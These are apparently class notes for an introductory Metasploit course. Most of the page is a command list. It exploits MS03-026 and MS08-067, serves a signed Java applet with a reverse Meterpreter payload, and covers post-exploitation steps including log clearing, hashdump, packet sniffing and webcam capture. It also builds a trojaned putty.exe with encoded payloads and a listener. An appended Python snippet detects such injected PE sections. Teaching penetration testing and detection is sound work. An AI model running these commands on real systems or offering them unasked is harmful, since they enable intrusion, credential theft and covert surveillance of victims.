Intro to Metasploit Class at IU Southeast (Hacking Illustrated Series InfoSec Tutorial Videos)
Intro to Metasploit Class at IU Southeast
This is a class we did to introduce students to Metasploit at IU Southeast.
Special guest lecturer Jeremy Druin (@webpwnize).
To follow along, I recommend downloading Kali Linux. Big thanks to http://www.offensive-security.com/ and please donate to http://www.hackersforcharity.org/
Download:
https://archive.org/download/IntoToMetasploitClassAtIUSoutheast/Into%20to%20Metasploit%20Class%20at%20IU%20Southeast.mp4
Notes:
Metasploit Notes 1
(Based on http://www.offensive-security.com/metasploit-unleashed)
Show directory structure
cd /opt/metasploit/apps/pro/msf3
ls
cd modules
<tab it out>
cd /opt/metasploit/apps/pro/msf3
Updates
msfupdate
apt-get update; apt-get dist-upgrade
msfcli
msfcli exploits/windows/dcerpc/ms03_026_dcom O
msfcli exploits/windows/dcerpc/ms03_026_dcom P
msfcli exploits/windows/dcerpc/ms03_026_dcom rhost=TARGET-IP lhost=METASPLOIT-IP payload=windows/shell_reverse_tcp E
msfcli exploits/windows/dcerpc/ms03_026_dcom rhost=TARGET-IP E
msfconsole
http://docs.kali.org/general-use/starting-metasploit-framework-in-kali
service postgresql start
service metasploit start
update-rc.d postgresql enable
update-rc.d metasploit enable
help
?
ping irongeek.com
search ms08
use exploit/windows/smb/ms08_067_netapi
back
info exploit/windows/smb/ms08_067_netapi
use exploit/windows/smb/ms08_067_netapi
show options
set rhost TARGET-IP
exploit
run
active vs passive
use exploit/multi/browser/java_signed_applet
set lport 3456
set SRVPORT 3245
set lhost METASPLOIT-IP
set APPLETNAME "Adrians_funapp"
set CERTCN irongeek.com
set ENCODER x86/shikata_ga_nai
set payload windows/meterpreter/reverse_tcp
set uripath /
run
jobs
kill 0
Social Engineering Toolkit Way
setoolkit
1 2 1 2
no
METASPLOIT-IP
irongeek.com
2 3
445
Meterpreter
ls
sysinfo
shell
exit
help
help core
background
sessions -l
sessions -i 1
cd
pwd
cat
clearev #Clear logs
getsystem
ps
migrate 608
getuid
hashdump
load -l
load sniffer
sniffer_interfaces
sniffer_start 1
sniffer_stats 1
sniffer_dump 1 /root/my.pcap
sniffer_stop 1
screenshot
resource somefile
run vnc
Using a Scanner
msfconsole
db_status
workspace
hosts
use auxiliary/scanner/smb/smb_version
set rhosts TARGET-IP/24
set threads 100
run
hosts
Trojans
/etc/init.d/apache2 start
cd /var/www
wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
msfpayload windows/meterpreter/reverse_tcp LHOST=METASPLOIT-IP LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe -x /var/www/putty.exe -k -o /var/www/puttyx.exe
Or
msfvenom -p windows/meterpreter/reverse_tcp LHOST=METASPLOIT-IP LPORT=443 -x /var/www/putty.exe -e x86/shikata_ga_nai -i 15 -k -f exe > some.exe
(in msfconsole)
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST METASPLOIT-IP
set LPORT 443
exploit
(run the exe, and show some other things)
webcam_list
webcam_snap 1
run webcam
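Added defender-side example, not part of the class notes: the template trick above (-x with -k) splices the payload into a copy of a legitimate executable, and that injected code typically lands in an extra section marked both writable and executable. A quick triage check is to parse the PE section table and flag writable+executable sections and section names outside the usual linker set; the parser, the allow-list of names (a heuristic assumption) and the sample headers built by build_sample_pe are all constructed here for illustration.

```python
import struct

# Section-characteristic bits from the PE/COFF specification.
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# Heuristic allow-list (assumption): section names mainstream Windows linkers emit.
COMMON_SECTIONS = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                   ".edata", ".pdata", ".tls", ".bss", ".CRT"}

def pe_sections(data):
    """Parse the PE section table; return a list of (name, characteristics)."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]        # offset of "PE\0\0"
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                                        # 20-byte COFF header
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]    # SizeOfOptionalHeader
    table = coff + 20 + opt_size                               # first 40-byte section header
    sections = []
    for i in range(num_sections):
        off = table + 40 * i
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        characteristics = struct.unpack_from("<I", data, off + 36)[0]
        sections.append((name, characteristics))
    return sections

def suspicious_sections(data):
    """Triage: flag writable+executable sections and sections with non-standard names."""
    findings = []
    for name, chars in pe_sections(data):
        if chars & IMAGE_SCN_MEM_EXECUTE and chars & IMAGE_SCN_MEM_WRITE:
            findings.append(f"{name}: writable+executable section")
        elif name not in COMMON_SECTIONS:
            findings.append(f"{name}: non-standard section name")
    return findings

def build_sample_pe(sections):
    """Build a minimal PE header with the given (name, characteristics) sections.
    Constructed sample for exercising the parser; it is not a loadable program."""
    dos_header = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)   # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x102)
    table = b"".join(struct.pack("<8sIIIIIIHHI", n.encode(), 0, 0, 0, 0, 0, 0, 0, 0, c)
                     for n, c in sections)
    return dos_header + b"PE\0\0" + coff + table
```

Comparing the downloaded file's hash against the one the publisher posts remains the simpler check whenever one is available.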
Armitage as Metasploit GUI
service postgresql start
service metasploit start
armitage